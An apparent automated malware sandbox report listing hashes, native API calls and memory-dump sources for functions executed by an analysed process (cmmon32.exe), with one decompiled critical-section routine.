                                                                            • Opcode Fuzzy Hash: b637f2308ef4bd77de45ce80f0987b38a1818b430174efe2310e75bb427ec94f
                                                                            • Instruction Fuzzy Hash: 9C90027120100D42D20062998444B4A0105A7E0741F51C02AA0514694DC655C8517AA1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 010B9670, Relevance: .0, Instructions: 2COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction ID: 19ed5717996c9acf41f7d43586f36c720145c07940b2a2b2f43d5d52f4c8d3bc
                                                                            • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0110FDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 53%
                                                                            			E0110FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E010BCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E01105720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E01105720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                                                            0x0110fdda
                                                                            0x0110fde2
                                                                            0x0110fde5
                                                                            0x0110fdec
                                                                            0x0110fdfa
                                                                            0x0110fdff
                                                                            0x0110fe0a
                                                                            0x0110fe0f
                                                                            0x0110fe17
                                                                            0x0110fe1e
                                                                            0x0110fe19
                                                                            0x0110fe19
                                                                            0x0110fe19
                                                                            0x0110fe20
                                                                            0x0110fe21
                                                                            0x0110fe22
                                                                            0x0110fe25
                                                                            0x0110fe40

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0110FDFA
                                                                            Strings
                                                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0110FE01
                                                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0110FE2B
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                            • API String ID: 885266447-3903918235
                                                                            • Opcode ID: 5693ed3271e3c8cb06e5443109a2c780000bf45635acdbca1f599ea595b04d61
                                                                            • Instruction ID: 7b9bb6222e35a15e651dc6387d24467f2026d5ce81bb17ff1a772b468e550579
                                                                            • Opcode Fuzzy Hash: 5693ed3271e3c8cb06e5443109a2c780000bf45635acdbca1f599ea595b04d61
                                                                            • Instruction Fuzzy Hash: 38F0F632600602BFE6291A45DC06F63BF5AEB44B70F150314F6685A1D1DAA2FC2096F0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: cmmon32.exe PID: 4896 Parent PID: 3388 cmmon32.exeCOMMON

                                                                            Executed Functions

                                                                            Function 001385CA, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00133BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00133BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0013861D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: fa4d3fe93a5bd96e72967c4d0221322ce0d1c4d2c002e3a71f875b488435deae
                                                                            • Instruction ID: 0b281f4a3ae1725dad72171a3b2ec18adc036d38d532ae62eeecfda721eb6b11
                                                                            • Opcode Fuzzy Hash: fa4d3fe93a5bd96e72967c4d0221322ce0d1c4d2c002e3a71f875b488435deae
                                                                            • Instruction Fuzzy Hash: 3A01B2B2215108AFCB08DF88DC85EEB77E9AF8C754F158248FA0D97241C630E851CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001385D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtCreateFile.NTDLL(00000060,00000000,.z`,00133BC7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00133BC7,007A002E,00000000,00000060,00000000,00000000), ref: 0013861D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID: .z`
                                                                            • API String ID: 823142352-1441809116
                                                                            • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction ID: a7ef3a498b241615aac4b25ff4db2189dfd841fbae196f5c54229cb325248446
                                                                            • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                            • Instruction Fuzzy Hash: B2F0B2B2200208ABCB08DF88DC85EEB77ADAF8C754F158248BA0D97241C630E811CBA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00138623, Relevance: 1.6, APIs: 1, Instructions: 73filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00133D82,5E972F65,FFFFFFFF,00133A41,?,?,00133D82,?,00133A41,FFFFFFFF,5E972F65,00133D82,?,00000000), ref: 001386C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 2d020790991105bb80e00e24b9279485b7ced82ad1456c299bb63c61b104a32a
                                                                            • Instruction ID: 79f47600832baffcf24e43a67a3383fcab6a4e0bb2caaef0bd523e6e3cd7def3
                                                                            • Opcode Fuzzy Hash: 2d020790991105bb80e00e24b9279485b7ced82ad1456c299bb63c61b104a32a
                                                                            • Instruction Fuzzy Hash: 001116B6204109AFCB18DFA9DC85DEB77ADEF8C350F158648FA5DD7241C630E8128BA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0013867A, Relevance: 1.6, APIs: 1, Instructions: 55filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00133D82,5E972F65,FFFFFFFF,00133A41,?,?,00133D82,?,00133A41,FFFFFFFF,5E972F65,00133D82,?,00000000), ref: 001386C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: f0122490124dfe175d076c63a8d3a45a62035b2e880e092d42bed573bbcf04a1
                                                                            • Instruction ID: 7970c5208b5184edc44013e297453ca28d6d9d9f054e55e4ec3b85e213d91c8b
                                                                            • Opcode Fuzzy Hash: f0122490124dfe175d076c63a8d3a45a62035b2e880e092d42bed573bbcf04a1
                                                                            • Instruction Fuzzy Hash: FF0121B2200118ABCB18DF98CC85EEB77A9EF8C350F158559FE1DA7241C670E910CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00138680, Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtReadFile.NTDLL(00133D82,5E972F65,FFFFFFFF,00133A41,?,?,00133D82,?,00133A41,FFFFFFFF,5E972F65,00133D82,?,00000000), ref: 001386C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileRead
                                                                            • String ID:
                                                                            • API String ID: 2738559852-0
                                                                            • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction ID: 938d03b3cc99ec28d11155f1d44bad665e596bbb18e0c9dc96f2c4bf67b02ace
                                                                            • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                            • Instruction Fuzzy Hash: F6F0BDB2200108AFCB14DF89DC85DEB77ADEF8C754F158248BE1D97241D630E811CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001387AA, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 001387E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: 898c9e11fb8f3c905fc59e532917137ddf4d15496f3f1f1a217f278cd05a4577
                                                                            • Instruction ID: 8f2cb019399cdf17dc8a08d8a124ac7b707b33dc77e6a2e4e87026a4f44f4723
                                                                            • Opcode Fuzzy Hash: 898c9e11fb8f3c905fc59e532917137ddf4d15496f3f1f1a217f278cd05a4577
                                                                            • Instruction Fuzzy Hash: 83F0F8B6200109ABDB14DF99DC84EA777A9BF98260F158249BA08A7241C631E911CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001387B0, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00122D11,00002000,00003000,00000004), ref: 001387E9
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2167126740-0
                                                                            • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction ID: 3eaeb1d066daf3af960783d91a989434583b11ced1be3efa1c9a9d9ea9503854
                                                                            • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                            • Instruction Fuzzy Hash: 43F015B2200208ABCB18DF89CC81EAB77ADAF88750F118148BE08A7241C630F810CBA0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 001386FA, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(00133D60,?,?,00133D60,00000000,FFFFFFFF), ref: 00138725
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: cbcad465a63d4d0a1ce22f6032d6345f36519db11c114d8f1c8a81c84402be5f
                                                                            • Instruction ID: a53177bef90cf480b75d032598552eb26d5daba3eadc851c9a8e9f69db0bc60c
                                                                            • Opcode Fuzzy Hash: cbcad465a63d4d0a1ce22f6032d6345f36519db11c114d8f1c8a81c84402be5f
                                                                            • Instruction Fuzzy Hash: 17E0C2362002046BD714EFD8CC89EAB7768EF447A0F154594BA096B242D270EA00C7D0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00138700, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtClose.NTDLL(00133D60,?,?,00133D60,00000000,FFFFFFFF), ref: 00138725
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.481945412.0000000000120000.00000040.00020000.sdmp, Offset: 00120000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Close
                                                                            • String ID:
                                                                            • API String ID: 3535843008-0
                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction ID: 50d05e40b419289a06a838d8f28315994c4de30df9740e3ea679fe02cf682ab2
                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                            • Instruction Fuzzy Hash: D7D012752002146BD714EB98CC45EA7775CEF44760F154455BA185B242C570F50086E0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: bceb7fb87956ce43b88c6bf3b3a28502c79eb8d89a6ae47c3a2eba797b04957e
                                                                            • Instruction ID: 6853a20c8a9ff5093814915e152a0a16cbf5792fb168ab5f06bf08b1afb7bbd5
                                                                            • Opcode Fuzzy Hash: bceb7fb87956ce43b88c6bf3b3a28502c79eb8d89a6ae47c3a2eba797b04957e
                                                                            • Instruction Fuzzy Hash: A69002A5611010032505A55A0704507004697D53A53A1C022F5006550CD765D861A161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 044195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 33ab8a1979b7d4d9782c7120df657df6c211ecf31b5457596d3ab6b311124f83
                                                                            • Instruction ID: 7d599d5fa5cbeca1935d60268d184cd502098ee74f7d530b5104ceab8d8690f6
                                                                            • Opcode Fuzzy Hash: 33ab8a1979b7d4d9782c7120df657df6c211ecf31b5457596d3ab6b311124f83
                                                                            • Instruction Fuzzy Hash: 499002E1602010036505715A4514616400A97E0255BA1C022E5005590DC669D891B165
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 6e3bc092d7d557152e362ae485bbfffd58695cfd4b37c3c9c21123d30b5219b1
                                                                            • Instruction ID: 43dd67b6543a0179a93dd7daa67075e6b313eb9c3091dda2742714594ded153c
                                                                            • Opcode Fuzzy Hash: 6e3bc092d7d557152e362ae485bbfffd58695cfd4b37c3c9c21123d30b5219b1
                                                                            • Instruction Fuzzy Hash: 1A9002B160505842F540715A4504A46001597D0359FA1C012A4055694D9769DD55F6A1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 89a25ad5855a9ec04f061fd7c26a168ba7f01d5ca2ef05876848a6b78000b856
                                                                            • Instruction ID: 28e8391b4c40e6687918c66271cd7656cb28ec43d875f0aae8ef22627af45b7b
                                                                            • Opcode Fuzzy Hash: 89a25ad5855a9ec04f061fd7c26a168ba7f01d5ca2ef05876848a6b78000b856
                                                                            • Instruction Fuzzy Hash: 349002B160101802F580715A450464A000597D1355FE1C016A4016654DCB59DA59B7E1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 044196D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 03ae7054064f0bfa4fff71d82be295b6832601e2a0da29fedaeeacc969c88c94
                                                                            • Instruction ID: ac8c481c66b4a4c2a4591d63e3640509abb192197fdfc250285e24f5a98ce81f
                                                                            • Opcode Fuzzy Hash: 03ae7054064f0bfa4fff71d82be295b6832601e2a0da29fedaeeacc969c88c94
                                                                            • Instruction Fuzzy Hash: 109002B160101842F500615A4504B46000597E0355FA1C017A4115654D8759D851B561
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 044196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9d8525aef28235e75cb5250778c3155616a0c67a1544b5d35108e726fa974e67
                                                                            • Instruction ID: 6506f3e3c763f79c56b5eaa98429dc749cfddf2f1f9f3b252b94bbb2663e6276
                                                                            • Opcode Fuzzy Hash: 9d8525aef28235e75cb5250778c3155616a0c67a1544b5d35108e726fa974e67
                                                                            • Instruction Fuzzy Hash: B99002B160109802F510615A850474A000597D0355FA5C412A8415658D87D9D891B161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 5382bec05f953d869662954fb37ba053694358a6adba417376ed96aee2baf81e
                                                                            • Instruction ID: 265653fd3d0ba3defef26829ac306cce96fcb4b6829464bbb4835da89c47f0ae
                                                                            • Opcode Fuzzy Hash: 5382bec05f953d869662954fb37ba053694358a6adba417376ed96aee2baf81e
                                                                            • Instruction Fuzzy Hash: BD9002B160101402F500659A5508646000597E0355FA1D012A9015555EC7A9D891B171
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: d6a48a16c2ff34ef450ec52ccfd48eb5f98ace45a5af3d4fe6cf5fd6e7593231
                                                                            • Instruction ID: 91efeffba7004cc5f58cf494b2c4896947961db68855f5ea8f3ce41cb7f85ab0
                                                                            • Opcode Fuzzy Hash: d6a48a16c2ff34ef450ec52ccfd48eb5f98ace45a5af3d4fe6cf5fd6e7593231
                                                                            • Instruction Fuzzy Hash: B29002B171115402F510615A8504706000597D1255FA1C412A4815558D87D9D891B162
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9fddc6acd706c76eb6c3aa7ba06eb1387e579c21fb800dafc26b94f958ab245b
                                                                            • Instruction ID: 12e8ba2e9dab6c97416f8e9b070431966b5a7d5a5008958d22f82b498915416c
                                                                            • Opcode Fuzzy Hash: 9fddc6acd706c76eb6c3aa7ba06eb1387e579c21fb800dafc26b94f958ab245b
                                                                            • Instruction Fuzzy Hash: 379002A961301002F580715A550860A000597D1256FE1D416A4006558CCA59D869A361
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 4264f0a1eb0438987064680a5fe520c626f9f14622283d76d18aec4d23fffb2b
                                                                            • Instruction ID: 170b33b1ab29ea78b69ac6c384294358812504429e0da343fbe22dc6cceafb9f
                                                                            • Opcode Fuzzy Hash: 4264f0a1eb0438987064680a5fe520c626f9f14622283d76d18aec4d23fffb2b
                                                                            • Instruction Fuzzy Hash: AC9002A1642051527945B15A45045074006A7E02957E1C013A5405950C866AE856E661
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: be2aefacecb93873ad144bff26b183404be0a5aec60d212d140d7aa56fef83ad
                                                                            • Instruction ID: 6d9073eee1c08ed62b125e5c9f5a4d9d279805a825c463ad66f677134f71eea9
                                                                            • Opcode Fuzzy Hash: be2aefacecb93873ad144bff26b183404be0a5aec60d212d140d7aa56fef83ad
                                                                            • Instruction Fuzzy Hash: 819002B160101413F511615A4604707000997D0295FE1C413A4415558D979AD952F161
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 9b53436f6c5ba918b1c196b26cd58449965b4c9d560388aa6619ab1c1b40f1ca
                                                                            • Instruction ID: 7ddc784128faf0cd4bc62d41dd0f933ed0299d8e659b168b7f1ac59c0784326c
                                                                            • Opcode Fuzzy Hash: 9b53436f6c5ba918b1c196b26cd58449965b4c9d560388aa6619ab1c1b40f1ca
                                                                            • Instruction Fuzzy Hash: AD9002F160101402F540715A4504746000597D0355FA1C012A9055554E879DDDD5B6A5
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 044199A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: dbc4746a9cc70271335bdf4ab2b865ecc046b3fda160e2bb91f00b09583d163e
                                                                            • Instruction ID: e423003e963b77d94eb7a087e832b8561447106aa3bdd0cb240d4fc6ab72444b
                                                                            • Opcode Fuzzy Hash: dbc4746a9cc70271335bdf4ab2b865ecc046b3fda160e2bb91f00b09583d163e
                                                                            • Instruction Fuzzy Hash: D09002E174101442F500615A4514B060005D7E1355FA1C016E5055554D875DDC52B166
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 04419A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000012.00000002.485770207.00000000043B0000.00000040.00000001.sdmp, Offset: 043B0000, based on PE: true
                                                                            • Associated: 00000012.00000002.486238417.00000000044CB000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000012.00000002.486258073.00000000044CF000.00000040.00000001.sdmp Download File
                                                                            Similarity
                                                                            • API ID: InitializeThunk
                                                                            • String ID:
                                                                            • API String ID: 2994545307-0
                                                                            • Opcode ID: 7393839b805bd5084353893736b0528511b6a686f4d31da60a7ca82527479c4d
